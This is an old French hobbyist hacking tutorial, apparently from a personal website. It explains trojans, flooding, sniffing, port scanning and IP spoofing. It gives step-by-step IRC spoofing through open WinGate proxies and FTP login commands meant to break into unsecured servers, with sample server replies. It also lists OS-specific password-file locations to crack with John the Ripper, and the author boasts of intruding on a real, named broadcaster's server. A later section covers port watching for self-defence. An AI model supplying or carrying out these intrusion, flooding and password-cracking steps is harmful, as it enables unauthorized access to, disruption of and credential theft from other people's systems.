La deuxième partie du troyen, celle que vous n'avez pas envoyé a la victime vous sert de poste de contrôle en quelque sorte et permet de communiquer avec les programmes crées sur le disque de la victimes. C'est pour ça qu'ils doivent rester opérationnel, pour que vous ne puisiez pas perdre la connection avec le pc de la victime (si bien sûr elle est connectée).

J'espère que le fonctionnement d'un troyen est plus clair à présent pour vous. Ne vous considérez pas hacker car vous utilisez un troyan horse car la faudrait pas abuser non plus mais dites vous que si vous connaissez la manière dont il marche, c'est déjà ça de gagné et ça vous aidera pour la suite...
 

Blooffer :

C'est un prog qui permet de ne pas être tracé quand on fait un hack. Autrement appelé brouiller d'ip. Mais bon c'est pas du 100% sûr car c'est comme tout, quand on trouve plus fort que soi en face, on tombe sur un os... Sur ce point J de la F avait raison.

Flooder :

Un flooder c'est un programme qui permet de ralentir les communications entre une personne et son fournisseur d'accès en gênant les transmissions des ports du modem de la dite personne. Pour utiliser ce programme contre quelqu'un, il suffit de connaître son adresse ip. Pour éviter de se faire Flooder, il suffit davoir un prog comme NukeNabber ou d'autres qui empêche le floodage (ça se dit?) et qui trouve l'ip de la personne qui vous floode. Après, à vous de juger du châtiment. Pour ma part, j'ai horreur qu'on m'agresse de quelque façon que ce soit. Crasher à mes heures? arf ! Qui sait?

Bon le flooder peut permettre de faire autre chose, c'est à dire de virer quelqu'un. Le principe, on envoie un "ping" à quelqu'un, c'est un signal qui déclenchera en retour un  signal de la personne que l'on veut flooder. Un signal c'est pas méchant mais si vous en envoyez beaucoup, les réponses seront plus nombreuses et le serveur saturera, et alors là le serveur va décider de virer la personne qui envoie trop de données, c'est-à-dire la victime du floodage (je sais toujours pas si ça se dit).

Je suis lancé alors je vais parler aussi du SYN flood. C'est un flood qui avait aussi pour but de crasher un serveur (sa connexion) mais qui passait par le port echo (7). Le but du port echo étant bien etendu de donner des rapport sur une cible ou une transmition, il répondait au flood et étaitdonc en position de faiblesse. A celà des parades on été crées notamment au niveau des firewalls et des démons. Maintenant si une machine reçoit par son port echo trop de demandes venants d'une ou de plusieurs machines en un temps très court, leurs ip sont enregistrées (elles le sont toujours de toute manière), et le port écho ne renvois plus de paquet a ces ip et n'en accepte plus non plus de celles ci. certain FW et demons vont même pluys loin et decidant se bloquer eux même leur port écho pour ne plus avoir de problèmes pour une durée limitée qui varie en fonction des paramètres choisis par l'admin, ou même pour une durée illimitée. En tout ca jusqu'à ce que le sysop se décide de le réouvrir (il sera donc bien sûr prévenu de la tentative de flood).

Sniffer:

Un sniffer c'est un logiciel qui permet d'intercepter des paquets sur un réseau. Cela s'avère très utile pour intercepter des adresses ip ou des contenus de paquets susceptibles de passer les firewalls. Cela permet aussi de connaître les noms d'hôtes autorisés ainsi que leur adresses MAC, etc... plein de bonnes choses utiles quoi. Cet article n'est pas fini, j'y reviendrais plus tard. D'ailleurs je mettrais bientôt gobbler dans la partie Progs pour que vous voyez à quoi ça ressemble et que vous appreniez à vous en servir.

Scanner d'ip et de ports :

C'est  un programme qui permet de savoir, à partir d'une adresse ip valable, à quel serveur elle appartient. Il permet également de savoir si le port que vous avez spécifié est ouvert sur tel ou tel machine. Il existe pleins de scanners très bien genre cyberkit et Wingate. Mais un scanner est un scanner et j'en ai mis quelques-uns dans la partie progs de ce site. Si vous avez linux je vous conseille nmap, il rends aussi beaucoup d'autres services. Vous le trouverez à cette adresse en attendant que je le mette sur mon site: http://www.insecure.org/nmap. Profitez en pour faire un tour sur ce site, il est pour moi bien meilleur que celui de rootshell.

Spoofing :

Ah, ah! Haute voltige, pas pour les lamerz. Ca consiste en quoi? Changer son adresse ip pour contourner des firewall ou autre protections ou pour ne pas se faire repérer, ne pas se faire tracer, passer incognito quoi. Les tout étant de prendre une ip qui n'aurait aucune chance de pouvoir vous être attribué quoi. Ca permet également d'intercepter des données transitant sur le réseaux pour les retourner vers soi. Different hacking quoi (à prononcer avec l'accent s'il vous plaît). C'est balaise et c'est à suivre, c'est pour bientôt...

Mais je vais quand même distinguer plusieurs choses, 3 pour être exact:
- spoofer d'irc, ça c'est super simple et c'est pas exactement de ça que je parlais au début.
-spoofer de mail, ça c'est déjà le niveau au dessus (à cent lieus au dessus)
-spoofer de connexion, ça c'est balaise, c'est de ça que je parlais plus haut.

Spoofer d'irc :

Ca sert à ne pas se faire nuker ou à pouvoir rentrer dans un salon où vous étiez banni ou encore flooder en toute impunité...

Pour cela il vous faudra avoir un programme que l'on appelle un scanner d'ip je vous reporte à l'article correspondant si vous ne l'avez pas déjà lu. Et puis vous aurez aussi besoin d'un Mirc mais ça si vous savez pas ce que c'est bah je vois pas pourquoi vous lisez cet article car manifestement vous n'en aurez pas besoin.

Quand vous vous connecté à internet votre fournisseur d'accès vous donne une ip. Jusque là tout va bien. Mais le fournisseurs d'accès pourra à l'aide de cet ip remonter jusqu'à vous. C'est donc une bonne raison pour, si vous voulez faire des truc "pas cool", la cacher. Et tant qu'à faire on va prendre celle d'un autre. Alors vous allez vous allez lancer mirc et vous connecter à un serveur irc quelconque et rentrer dans un salon. Le nom de celui ci n'a pas d'importance du moment qu'il y a au mons une personne dedans. Vous allez trouver son ip en faisant un /dns ou un whois. Si vous savez pas comment faire reportez à vous à l'article adresse ip. Une fois que vous avez son ip vous allez lancer votre scanner d'ip. Là on va faire un exemple:

Imaginez que le nick (pseudo) du mec soit Assassin et que l'ip que vous ayez trouvé de lui soit 152.194.56.132 (arf encore un mec d'aol, ils sont partout)

Etant donné qu'un scanner scanne toujours les ip de 0 à 255 et toujours en ordre croissant on va rentrer dans le scanner les ip suivantes: 152.194.56.0 et 152.194.56.255. On choisit un port, le 23, celui du telnet. Et on lance la recherche. Il va nous sortir plusieurs ip (espérons). S'il n'en sort pas, on fait un /dns sur un autre nick et ainsi de suite jusqu'à trouver des ip mais normalement pas de problèmes. Les ip qui apparaîtront sont les ip de machines ayant le port choisi (ici le 23) ouvert. Imaginez que plusieurs ip sortent dont celle ci: 152.194.56.13

Maintenant vous allez taper l'instruction suivante sur irc: /serveur   ip_du_mec   port_tenet
Dans notre exemple: /server 152.194.56.13 23

Mirc va alors vous écrire les commandes suivantes:
*** Disconnected

*** Connecting to 152.194.56.13 (23)

Local host: rhylmachine (152.172.127.204)

ÿû ÿûÿýWinGate>NICK endrix
Connecting to host NICK...Host name lookup for 'NICK' failed
USER RhylKim "rhylmachine" "152.194.56.13" nono lpti robo
Connecting to host USER RhylKim "rhylmachine" "152.194.56.13" ...Host name lookup for ' USER
RhylKim "rhylmachine" "152.194.56.13" ' failed

Une fois votre ip spoofée auprès d'irc il va falloir vous reconnecter car la précédente manip vous a déconnecté. et pour ça vous allez faire: /raw   nom_du_serveur   port_irc

Dans notre exemple: /raw irc01.irc.aol.com 6667

Mirc va alors vous écrire les commandes suivantes:
aol.com rg "rhylmachine" "152.194.56.13" ...Host name lookup for ' USER
RhylKim "rhylmachine" "152.194.56.13" ' failed
Connecting to host irc01.irc.aol.com ...Connected

Maintenant les formalités:
votre nick: /nick votre_nick
Dans notre exemple: /nick RhylKim

puis:
/user ident x x full_name
Dans notre exemple: /user nono lpti robo x x rhylmachine

Voilà c'est bon votre adresse ip est spoofée sur mirc. Si quelqu'un fait un /dns ou un whois sur vous, c'est l'adresse ip spoofée qu'il verra et non le vôtre. C'est là que je me retire et que vous allez pouvoir vous affirmer. Je suis pas un partisan du flood ou du nuk sur irc mais comme je ne pourrais pas empêcher les lames de les utiliser bah je vous donne la méthode de vous en préserver. Et puis merde faut mettre fin au bannissement des salons. ;-)

Les articles sur les autres spoff possibles viendront bientôt. Donc patience...
 

Root :

Un root c'est un mec, ou une fille, qui a le statut de super-user, c'est à dire qu'il a les droits sur un réseau de n'importe quel user (utilisateur) normal mais qu'il a en plus accès a des commandes et des secteurs que les autres n'ont pas. Ca lui permettra de changer ce qu'il veut, d'importer ou d'exporter des fichiers, de créer des programmes sur la machine, de formater, de supprimer, ... Le but de n'importe quel hacker est de pouvoir devenir root sur une bécane. Mais pour cela il faut un login (root la plupart du temps) et un password. Pour ça on verra plus tard.

Hack par ftp :

On ne m'a pas encore fait le reproche de ne pas donner assez de techniques de hacking dans la rubrique hacking mais dans un désir d'anticiper ce reproche, je vais donner une manière de hacker un serveur non sécurisé par ftp. D'abord on va expliquer ce qu'est ftp. ftp c'est un protocole qui permet de transmettre des fichiers d'un ordinateur à un autre. Les ports qui lui sont attribués sont les n°20 et 21. Quand vous allez sur un site de Warez pour choper des progs crackés vous passez généralement par ftp, vous voulez télécharger une page WEB, c'est aussi par ftp, quand vous vous rendez sur un serveur en tant que user, c'est aussi des fois par ftp. Si vous êtes sous windows, pour ouvrir une fenêtre ftp, il faut faire: Démarrer, Exécuter, et taper "ftp -n". Bon, faut pas pousser non plus, c'est pas aussi simple que ça de hacker un serveur par ftp, il suffit pas d'ouvrir la fenêtre ftp, c'est plus compliqué car chaque serveur demande un login et un password pour chaque user.

Le truc que je vais vous donner ne marche que sur les serveurs non sécurisés alors n'essayez pas ça sur le Pentagone, ça marchera pas. On parle toujours du Pentagone, de la CIA, de la Nasa... mais il y a pleins de serveurs sécurisés dans le monde et ils ne sont pas forcement gouvernementaux, loin de là...

Je vous donne le truc et on en reparle après:

                      open url_du_site
                      quote user ftp
                      quote cwd ~root
                      quote pass ftp

Mettez des espaces ou je les ai mis et tout ce passera bien.

Exemple:        open www.assassin.com
                      quote user ftp
                      quote cwd ~root
                      quote pass ftp
Ici le serveur a comme adresse url: http://www.assassin.com/.

Ces instructions doivent être entrées dans un fenêtre ressemblant beaucoup à celle du dos, à chaque ligne, il y aura marqué "ftp>". Pour ouvrir cette fenêtre on procède comme expliqué précedement. Une fois connecté à un site (après avoir tapé: open url_du_site), vous verez apparaitre "Connected to url_du_site". Il se peut qu'après vous être connecté à un serveur vous receviez le message suivant: "Ce serveur est protégé" ou "attention aux malversations que vous pourrez faire" ou "regardes par la fenêtre, les flics sont déjà en bas de chez toi"... Dans ce cas là c'est même pas la peine d'aller plus loin car à 99% le serveur est sécurisé car si l'administrateur réseau a pu être assez consciencieux pour mettre un message d'avertissement, il l'est assez pour nous empêcher de pénétrer de cette manière dans sont serveur. :-(
Il se peut même qu'une fois connecté, vous voyez "Connexion closed by remote host.", là c'est encore plus vache, c'est que le serveur n'est pas accessible de cette manière par ftp. De cette manière seulement.... ;-)

On va voir maintenant ce que le serveur répond en fonction de ce que l'on marque et de si oui ou non on pourra rentrer dedans:
Ce qui est en bleu c'est ce que l'on tape
Ce qui est en jaune c'est ce que le serveur répond
Ce qui est en blanc c'est soit ftp soit des remarques de ma part
 
Serveur que l'on pourra hacker par ce moyen : Serveur que l'on ne pourra pas hacker par ce moyen :
ftp>open www.assassin.com open www.assassin.com
Connected to www.assassin.com 
220 websrv1 Microsoft FTP Service (Version 4.0).
Connected to www.assassin.com 
websrv1 Microsoft FTP Service (Version 4.0).
"Ce qu'il y aura marqué dépendra du système d'exploitation, de la version de celui ci... Il se peut même qu'il y ait marqué la 
date et l'heure de la dernière mise à jour."
"Ce qu'il y aura marqué dépendra du système d'exploitation, de la version de celui ci... Il se peut même qu'il y ait marqué la 
date et l'heure de la dernière mise à jour."
ftp>quote user ftp ftp>quote user ftp
331 Anonymous acces allowed, send identify (e-mail name) as password. 331 Password required for ftp.
ftp>quote cwd ~root ftp>quote cwd ~root
530 Please login with USER and PASS. 530 Please login with USER and PASS.
ftp>quote pass ftp ftp>quote pass ftp
230 Anonymous user logged in. 530 User ftp cannot log in.
Voilà, logiquement et sauf erreur vous êtes root ou tout du moins user, si c'est le cas, il faut trouver /etc puis décrypter le password et là vous vous connecterez en tant que root.     :-) Bon, bah là, rien à faire avec cette méthode, c'est probablement un serveur dit "secure", quoi que... Bref une seule remarque:                          :-(
Une fois que vous êtes root ou user, ca sont les commandes ftp qui s'appliquent (pas les commandes dos ni les commandes unix):

          mkdir : pour créer un répertoire (exemple: mkdir assassin crée le répertoire assassin).
          rmdir : pour supprimer un répertoire (exemple: rmdir assassin supprime le répertoire assassin).
          pwd : pour voir ou vous êtes sur le disque.
          cd : pour aller dans un répertoire (exemple: cd assassin pour aller dans le répertoire assassin).
          dir : pour voir le contenu de la racine ou du répertoire où vous êtes.
          cd / : pour revenir à la racine. Ne pas oublier l'espace entre cd et /.
          cd .. : pour revenir au répertoire précédent. Ne pas oublier l'espace entre cd et ..
          del : pour supprimer un fichier (exemple: del assassin.txt supprime le fichier assassin.txt).
          get : pour prendre un fichier et le mettre sur votre bureau (exemple: get assassin.txt vous donne le fichier assassin.txt)

Pour vous illustrer un peu cet artile je suis allé sur altavista (pas astalavista) et j'ai tapé un mot au hasard (en l'occurrence ici c'était télé), je suis tombé sur une dizaine de sites et j'en ai pris un au hasard, j'ai noté son url. Là c'était www.comedie.com (vous savez, le serveur de la chaîne télé comédie qui passe sur le câble). J'ai appliqué ce que j'ai écris au dessus plus deux ou trois autres petits trucs et je suis devenu root sur la bécane, le temps de m'amuser un petit peu. Je n'ai rien supprimé vu que je suis un gentil hacker mais j'ai laissé des traces de mon passage... En utilisant cette méthode vous ne serez pas root (777) sur cette bécane mais vous pourrez quand même faire pas mal de choses.  Cet exploit étant périmé sur la plupart des bécanes, vous ne serez que User sur un account anonymous, cependant la perle rare se trouve quelque part, malheureusement avec le temps elle devient de plus en plus rare. Vous pourrez même vous en servir de vmb pour me laisser des messages si le coeur vous en dit...

Pour quitter ftp, vous n'avez qu'à taper "quit". Voilà c'est tout, amusez vous bien mais ne foutez pas la merde sinon je ne donnerais plus rien.

PS: Pour la vmb je plaisantais, évitez de le faire car une fois hacké, ce serveur mettra en place des instruments de recherche pour éviter que cela ne recommence. Alors si vous êtes débutant, cherchez un autre serveur, faites comme j'ai fais pour le serveur de comédie: Altavista.

 

Les Ports :

Les ports sur une machine sont des entrées sur votre pc qui vous permettent d'échanger des informations dans un sens ou dans un autre avec une autre machine. Sur Internet vous pouvez échanger énormément de données par plusieurs ports différents à plusieurs machines. Chaque port a ses caractéristiques, l'un permet de lire le courrier, l'autre permet de communiquer par icq, un autre permet de télécharger des fichiers... Il existes plusieurs centaines de ports différents sur une machine, je vous mettrais plus bas une liste des ports que je j'essaierais de détailler le plus possible. Bref, vous l'aurez compris, les ports sont indispensable à l'échange d'informations par internet, cependant, comme ils constituent les seules entrées existantes vers votre pc, c'est par la que les hackers pénètrent dans votre machine et réciproquement, c'est par ces ports que vous vous infiltrerez dans un serveur ou n'importe quel ordinateur.

Certain vous dirons sûrement quelque chose, comme le port 21 qui est celui du ftp , le port 23 est aussi assez connu puisque c'est celui du telnet et aussi  l'entrée favorite de la majorité des troyens (d'où le nom Socket23), le port 25 appelé SMTP permet d'envoyer du courrier et le port 110 (POP), permet de relever celui ci. J'en énumère une petite partie en dessous mais les plus importants y sont. Ceux que vous devez connaître par coeur sont en jaune mais si vous en connaissiez plus ce ne serait pas un mal. Enfin cela viendra avec l'expérience. Les voici:
 
 

Nom des ports: N° du port et protocole:
tcpmux 
compressnet 
compressnet 
rje 
echo 
discard 
systat 
daytime 
netstat 
qotd 
msp 
chargen 
ftp-data 
ftp 
telnet 
smtp 
nsw-fe 
time 
rlp 
name 
whois 
domain 
nameserver 
mtp 
bootp 
tftp 
gopher 
rje 
finger 
http 
link 
supdup 
hostnames 
iso-tsap 
dictionary & x400 
x400-snd 
csnet-ns 
pop & pop2 
pop3 
portmap 
sunrpc 
auth 
sftp 
path 
uucp-path 
nntp 
ntp 
nbname 
nbdatagram 
nbsession 
NeWs 
sgmp 
tcprepo 
snmp 
snmp-trap 
print-srv 
vmnet 
load 
vmnet0 
systek 
biff 
exec 
login 
who 
shell 
syslog 
printer 
talk 
ntalk 
efs 
route 
timed 
tempo 
courier 
conference 
rdv-control 
netwall 
uucp 
klogin 
kshell 
new-rwho 
remotefs 
rmonitor 
monitor 
garcon 
maitrd 
busboy 
acctmaster 
acctslave 
acct 
acctlogin 
acctprinter 
elcsd 
acctinfo 
acctslave2 
acctdisk 
kerberos 
kerberos_master 
passwd_server 
userreg_server 
kreb_prop 
erlogin 
kpop 
phone 
ingreslock 
maze 
nfs 
knetd 
eklogin 
rmt 
mtb 
military http 
man 

mantst 
bnews 
rscs0 
queue 
rscs1 
poker 
rscs2 
gateway 
rscs3 
remp 
rscs4 
rscs5 
rscs6 
rscs7 
rscs8 
rscs9 
rscsa 
rscsb 
qmaster
1/tcp & 1/udp 
2/tcp & 2/udp 
3/tcp & 3/udp 
5/tcp & 5/udp 
7/tcp & 7/udp 
9/tcp & 9/udp 
11/tcp 
13/tcp 
15/tcp (n'existe plus il me semble) 
17/tcp & 17/udp 
18/tcp & 18/udp 
19/tcp & 19/udp 
20/tcp 
21/tcp 
23/tcp 
25/tcp 
27/tcp & 27/udp 
37/tcp & 37/udp 
39/udp 
42/tcp & 42/udp 
43/tcp 
53/tcp & 53/udp 
53/tcp & 53/udp 
57/tcp 
67/udp 
69/udp 
70/tcp 
77/tcp 
79/tcp 
80/tcp 
87/tcp 
95/tcp 
101/tcp 
102/tcp 
103/tcp 
104/tcp 
105/tcp 
109/tcp 
110/tcp 
111/tcp & 111/udp 
111/tcp & 111/udp 
113/tcp 
115/tcp 
117/tcp 
117/tcp 
119/tcp 
123/udp 
137/udp 
138/udp 
139/tcp 
144/tcp 
152/udp 
158/tcp 
161/udp 
162/udp 
170/tcp 
175/tcp 
315/udp 
400/tcp 
500/udp 
512/udp 
512/tcp 
513/tcp 
513/udp 
514/tcp 
514/udp 
515/tcp 
517/udp 
518/udp 
520/tcp 
520/udp 
525/udp 
526/tcp 
530/tcp 
531/tcp 
531/udp 
532/tcp 
533/udp 
540/tcp 
543/tcp 
544/tcp 
550/udp 
556/tcp 
560/udp 
561/udp 
600/tcp 
601/tcp 
602/tcp 
700/udp 
701/udp 
702/udp 
703/udp 
704/udp 
705/udp 
706/udp 
707/udp 
750/tcp & 750/udp 
751/tcp & 751/udp 
752/udp 
753/udp 
754/tcp 
888/tcp 
1109/tcp 
1167/udp 
1524/tcp 
1666/udp 
2049/udp 
2053/tcp 
2105/tcp 
5555/tcp 
5556/tcp 
5580/tcp 
9535/tcp 
9536/tcp 
9537/tcp 
10000/tcp 
10000/udp 
10001/tcp 
10001/udp 
10002/tcp 
10002/udp 
10003/tcp 
10003/udp 
10004/tcp 
10004/udp 
10005/udp 
10006/udp 
10007/udp 
10008/udp 
10009/udp 
10010/udp 
10011/udp 
10012/tcp & 10012/udp
Comme vous pouvez le voir c'est une liste assez exhaustive, il y en a que je n'ai pas mis car je ne sais pas à quoi ils servent, il doit en exister plusieurs milliers je pense. Je sais qu'il y en a aussi vers les 31000 et quelques mais bon, c'est pas les plus utilisés et ils risquent rarement d'être ouvert. Malgré ça si vous en connaissez d'autres en détail que je n'ai pas cité vous pouvez toujours me contacter.

Bref je vois pas trop quoi dire d'autre sur les ports sinon que si les vôtres sont tous fermés, vous n'avez aucune chance, mais alors aucune, de vous faire hacker. Ceci est valable bien sur si votre disque est saint, c'est sur que si vous êtes infecté par au minimum un troyen ou si vous avez une bombe logique camouflée quelque part dans votre ordinateur, vous risquez d'avoir certains problèmes vu qu'un programme comme un troyen a comme but premier d'ouvrir un port pour que vous puissiez entrer et faire ce que vous y voulez.
 

 

Les FireWalls :
 

 

Les droits sous UNIX :

Sous Unix, tous les fichiers et les répertoires ont des paramètres qui ne sont définissables que par le root et qui permettent de limiter leur accès. Suivant la personne que vous êtes et les droit qui vous sont alloués par le root, vous aurez un droit de faire plus ou moins de choses dans la bécane où vous êtes. Les différents droits sont regroupés en trois catégories, le droit d'écriture, de lecture et d'exécution.
Le premier droit (write: w) permet de supprimer et de créer un fichier ainsi que de le modifier, de le renommer ou de le déplacer. Le deuxième (read: r) permet de le lire (code source et autre), quand au troisième (execute: x), il permet comme son nom l'indique d'exécuter des programmes.
Chacun de ces droits est attribué ou non à chaque personne sur la bécane. Chaque personne est placée dans un des trois groupes suivants: propriétaire, membre du même groupe que le propriétaire, personne extérieure.
Ils sont représentés de la manière suivante quand vous faites un "ls -1" (comme dir sous dos):
 
 
 l   r w x r - x - - -   0   assassin   1050   15/03/99   17:34   hacking 
1
2a
2b
2c
3
4
5
6
7
8
Tableau d'équivalence :
 
1 Indique la nature du fichier. d = répertoire ; l = fichier ; 
2a  Les droits du propriétaire du fichier: dans cet exemple, il a tous les droits ( r + w + x ).
2b  Les droits d'une personne appartenant au même groupe que la propriétaire du fichier: 
dans cet exemple il ne peut que lire et exécuter le fichier (r + x). 
2c Les droit d'une personne étrangère au groupe: dans cet exemple elle n'a aucun droit: 
le "-" dit qu'il n'a pas de droit. Elle a des "-" en lecture, en écriture et en exécution, elle n'a donc pas de droit.
3 Le propriétaire du fichier. 0 = root ; 1 = bin ; 2 = daemon ; 3 = adm ; 4 = lp ; 5 = sync ; ... ; 99 = nobody . 
Mais tout ceci change en fonction des choix de l'administrateur système puisque c'est paramètrable.
4 C'est le nom du groupe dont fait parti le propriétaire du fichier.
5 Taille du fichier (en Ko).
6 La date de la dernière modification ou lecture.
7 L'heure de la dernière modification ou lecture.
8 Le nom du fichier ou du répertoire (selon ce qui est écrit au 1)
Donc dans l'exemple du dessus vous voyez qu'il sagit d'un fichier nommé hacking crée le 15 mars 99 à 17H34 par le root qui appartient au groupe assassin (mais pas sûr qu'il fasse du rap ;-) ). Le fichier fait 1050 Ko, il peut être lu, changé, déplacé, supprimé, renommé, exécuté par le propriétaire. Une personne faisant, comme le root, partie du groupe assassin peut, elle, que lire et exécuter le fichier. Une personne extérieure au groupe ne pourra rien faire avec ce fichier.

Bien sûr quand vous faites un ls -1 il y a la plupart du temps plus qu'un fichier ou qu'un répertoire qui s'affiche mais la règle reste la même.
 

Les Passwords Shadows :

Joli nom n'est ce pas? Ouais mais ce n'est pas là que pour faire joli en fait. Vous vous en doutiez je suppose vu que les passwords c'est généralement fait pour autoriser un accès aux seuls autorisés et le restreindre ou le barrer pour les autres. Si vous savez pas ce qu'est un système Unix, c'est pas la peine de lire cet article. Bon pour les autres, vous savez que pour se faire root sur une bécane sous unix il faut connaître le login et le pass du root (et oui c'est quand même rare que le root ait gardé le même login). Ces informations étaient gardées dans un fichier appelé passwd qui se trouvait dans le répertoire /etc. Alors c'était facile car une fois ce fichier trouvé il suffisait de le passer à Jack ou à John (cracker Jack ou John the ripper) et avec ses bibliothèques de mots, il moulinait jusqu'à trouver le bon et hop le pass était trouvé (bah oui fallait bien le décrypter).

Maintenant avec les pass shadowés (ou shadows, chacun y verra son vocabulaire), les fichiers password ne se trouvent plus dans le fichier /etc. Et oui, c'était trop facile. Reste que si vous trouvez ce fichier, vous pouvez toujours utiliser Jack ou John, ça marche toujours. Bien sûr il faut avoir les bonnes bibliothèque et plus on en a mieux c'est.

Où trouver ce fameux password shadow alors? Et ben en fait il faudra que vous vous renseigniez sur le type d'OS sur lequel vous êtes (normal quoi) et quand vous saurez duquel il sagit, il ne suffira plus qu'à aller à la pèche aux infos le concernant. Et pour cela on se reporte au beau tableau que j'ai fait en dessous. Je vous rassure, toutes les infos mises dans ce tableau n'ont pas tous été collectés par moi (loin de là même, merci aux alt2600 d'avoir fait une FAQ), mais elles sont là et c'est quand même le principal non?
 
 

OS et versions :
location du fichier contenant les passwords :
AIX 3
/etc/security/passwd 
ou     /tcb/auth/files/1ère lettre du login/login
A/UX 3.Os
/tcb/files/auth/?/
BSD4.3-Reno
/etc/master.passwd
ConvexOS 10
/etc/shadow
Convex0S 11
/etc/shadow
DG/UX
/etc/tcb/aa/user
EP/IX
/etc/shadow
HP-UX
/.secure/etc/passwd
IRIX 5
/etc/shadow
Linux 1.1
/etc/shadow
OSF/1
/etc/passwd/[.dir|.pag]
SCO Unix #.2.x
/tcb/auth/files/1ère lettre du login/login 
Exemple: /tcb/auth/files/r/root
SunOS 4.1+c2
/etc/security/passwd.adjunct
SunOS 5.0
/etc/shadow
System V 4.0
/etc/shadow
System V 4.2
/etc/security
Ultrix 4
/etc/auth/[.dir|.pag]
UNICOS
/etc/udb
Bah voilà c'est tout ce que j'ai, je me rend bien compte que ça fait pas grand chose mais à mon avis ça sera plus que suffisant pour vous amuser plus que quelque temps. Ah oui, dernière chose, pour savoir si un pass est shadow, il suffit d'aller dans le répertoire où il serait s'il n'était pas shadow et de regarder si il y a un X (sous un browser normal) ou une *(en mode console UNIX, de Linux par exemple).

La plupars du temps les systèmes ayant des pass shadows (UNIX) ont gardé leur /etc/passwd mais celui ci ne vous sera d'aucune utilité ou presque vu que tous les users inscrits dedans seront désactivés. Cela ne veut pas dire que, si un user a le login "RhylKim" dans le fichier passwd d'une bécane ayant ses pass shadows, le login "RhylKim" n'existe pas et bien au contraire il se peut très bien que ce soit encore l'un des logins autorisés (pas obligé, ce login ne peut être qu'un piège ou un ancien login non effacé mais désactivé). Le problème est que sur UNIX quand un login est désactivé, on remplace l'endroit où devait se trouver le pass crypté par une * (si on matte le passwd depuis un UNIX) ou un X (si on le matte depuis un browser). Et les pass shadows reprennent le même principe puisque qu'un fichier passwd du repertoire /etc (toujours si le bécane a ses pass shadows) aura tous les logins suivis d'une * et non du pass crypté. Donc si vous arrivez (par exemple depuis un cgi) à matter le /etc/passwd vous pouvez voir s'il a des pass shadows avec les *, et après, en fonction de l'OS, matter le fichier contenant les passwords (grâce à la liste ci dessus). Entendons nous bien, si le /etc/passwd contient des étoiles mais au moins un login suivit d'un password, la bécane n'aura pas de pass shadows donc ne perdez pas de temps à chercher le fichier coneant les pass shadows, il n'existera pas et s'il existe c'est qu'il a servi mais qu'il ne sert plus (ou pour vous pièger mais là je vois pas bien en quoi).

Une dernière chose, les serveurs tournants sur AIX d'IBM peuvent ne pas avoir de croix mais des # ou des ! alors ne vous étonnez pas non plus.
 

NukeNabber et Port Watchers :

NukeNabber est un port watcher, c'est à dire que c'est un programme qui a pour fonction de fermer vos ports d'écouter ce qui passe dessus. Ca permet de savoir à tout moment si quelqu'un essaye de rentrer sur votre machine, de vous nuker, de scanner vos ports, de vous flooder, d'ouvrir une session ftp, ... De plus ça vous donne l'ip du mec qui veut rentrer. :-) Ce programme est donc indispensable pour votre sécurité et il est disponible sur ce site dans la partie progs.

J'ai pas fais un article pour vous expliquer ça, sinon ça va servir à qui? C'était juste un interlude. Ce que je vais vous expliquer ici, c'est comment le paramètrer. Parce que les paramètres de bases sont très insuffisants pour vous garantir une bonne sécurité. Il ne faut rentrer dans NukeNabber que les ports qui sont indispensables, car même si vous pouvez en mettre jusqu'à 50, les mettre tous ralentirait votre connection. De plus en écoutant certains ports comme les ports 27, 28 et 29 par exemple qui sont actuellement utilisé, NukeNabber vous marque "Port 29 (tcp) is already in use" et là ça sert à rien car non seulement personne ne pouvait passer par là avant du fait qu'une autre application passait par ce port mais en plus ça bloquera l'application. Vous voulez essayer? Mettez le port 29/tcp sous écoute et vous verrez ce que Netscape va vous dire quand vous essaierez de vous connecter à mon site (ou à n'importe quel site sur Internet, mais ça vous donnera une excuse pour revenir. Il en faut une?! ;-) )...

A ouais mais pour cela il faudrait que vous sachiez comment mettre tel ou tel port sous écoute. Vous allez dans File, options, advanced. Vous allez dans la listes des ports watchés et vous faites descendre l'ascenseur jusqu'à ce que vous voyez un "unassigned", cliquez dessus, puis mettez le numéro du port dans "port to monitor" et le protocole dans "protocol". Les protocole c'est tcp, udp ou tcmp. Tout ça c'est affaire de réseaux, j'expliquerait plus tard à quoi ça correspond et ce qui différencie les paquets arrivants de ces différents réseaux. Après appuyez sur "Add" et voilà, le port est watché. Il sera sous écoute dès que vous appuierez sur Ok. Utilisez les options de ports par défaut.

Les différents ports dangereux à écouter sont les suivants. J'explique aussi pourquoi chaque port est dangereux. Sachez qu'en règle générale si vous ne fermez pas ces ports vous êtes à 100% exposé au risque d'être nuké, floodé et votre pc de se transformer en serveur ftp ou telnet pour troyens.
 

Numéro des ports à watcher: Protocole: Type d'attaque possible par ce port:
0
icmp
Bonne question, du genre troyen mais sans taupe 
alors fermez ce port, c'est l'un des plus dangereux.
19
udp
 
21
tcp
Troyen (et ouais c'est ftp les mecs)
23
tcp
Troyen (et ça c'est telnet, sans commentaire)
53
tcp
 
59
tcp
Nuker, Flooder
129
tcp
 
137
tcp
Nuker, Flooder (netbios)
138
tcp
 
139
tcp
Nuker, Flooder (encore le netbios)
666
tcp
Troyen (par défaut celui de peur2rien)
1027
tcp
 
1029
tcp
 
1032
tcp
 
5000
tcp
Troyen (par défaut celui du Sockets de troie)
5001
tcp
Troyen (Sockets de troie aussi)
12345
tcp
Troyen (par défaut celui de Netbus)
12346
tcp
Troyen (Netbus aussi)
30303
tcp
Troyen (je me souviens plus lequel)
31337
tcp
Troyen (par défaut celui de Back Orifice)
Les ports où je n'ai pas mis d'attaque possible c'est pas parce qu'il n'y en a pas de possible, sinon, je ne les aurais pas mis dans ce tableau. Ce sont soit les ports donnés par défaut par Nukenabber, donc même si je sais pas ce que l'on risque, vaut mieux les mettre quand même. Soit des ports que j'avais sécurisé sur mon NukeNabber il y a pas mal de temps et dont je ne sais plus les risques possibles. Mais comme je ne met pas les ports au hasard, mettez les aussi, ce n'est pas du tout du superflu.

Je vous conseille également de lancer NukeNabber à chaque fois que vous vous connectez sur le net. Sur ma bécane il est lancé à chaque démarrage en même temps que l'antivirus. Pour qu'il se lance à chaque fois que le pc s'allume mettez un raccourcit vers NukeNabber dans le répertoire démarrage du menu démarrer de Windows.

Cgi-bin et Scripts... :

